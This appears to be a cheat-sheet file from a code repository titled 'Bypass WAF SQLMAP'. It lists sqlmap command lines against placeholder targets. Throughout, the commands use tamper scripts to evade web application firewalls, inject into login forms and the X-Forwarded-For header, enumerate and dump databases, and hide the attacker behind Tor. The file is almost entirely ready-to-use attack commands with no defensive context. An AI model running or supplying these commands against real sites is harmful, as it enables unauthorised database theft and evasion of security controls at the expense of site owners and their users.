-
Notifications
You must be signed in to change notification settings - Fork 61
/
Copy pathExample-Bypass-WAF-SQLMAP.txt
36 lines (27 loc) · 3.96 KB
/
Example-Bypass-WAF-SQLMAP.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
███╗ ███╗██████╗ ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗ ██████╗ ██████╗ ██████╗
████╗ ████║██╔══██╗ ██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔════╝ ██╔════╝
██╔████╔██║██████╔╝ ██║ ███╗███████║██║ ██║███████╗ ██║ ███████╗ ███████╗ ███████╗
██║╚██╔╝██║██╔══██╗ ██║ ██║██╔══██║██║ ██║╚════██║ ██║ ██╔═══██╗██╔═══██╗██╔═══██╗
██║ ╚═╝ ██║██║ ██║██╗╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ╚██████╔╝╚██████╔╝╚██████╔╝
╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝
#Bypass WAF SQLMAP
Example:
$ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
$ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --dbs
$ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
$ sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
$ sqlmap -u "sitetarget.com/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --dbs --technique=T
$ sqlmap -u "sitetarget.com/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --headers="input field header" --dbs --technique=T
Example Bypass WAF SQLMap New Version Update :
$ sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
$ sqlmap -u "Target.com" --random-agent -v 3 --dbs
$ sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
$ sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
$ sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbs
example dump DB use poc http post request :
$ sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbms=MySQL -D database_target --tables
example WAF Header :
$ sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --drop-set-cookie --dbms=mysql --dbs
$ sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --dbs
example WAF CloudFlare use proxy Tor default :
$ sqlmap -u "https://target.com" --data="id=63665%20RLIKE%20-bla-blablabla" --time-sec=20 --random-agent --level=5 --risk=3 --tamper="space2comment,between,randomcase,charencode" --technique=BEUST --privileges --no-cast --tor --tor-port=9050 --tor-type=socks5 --check-tor --banner --union-char=1 --dbms=MySQL --dbs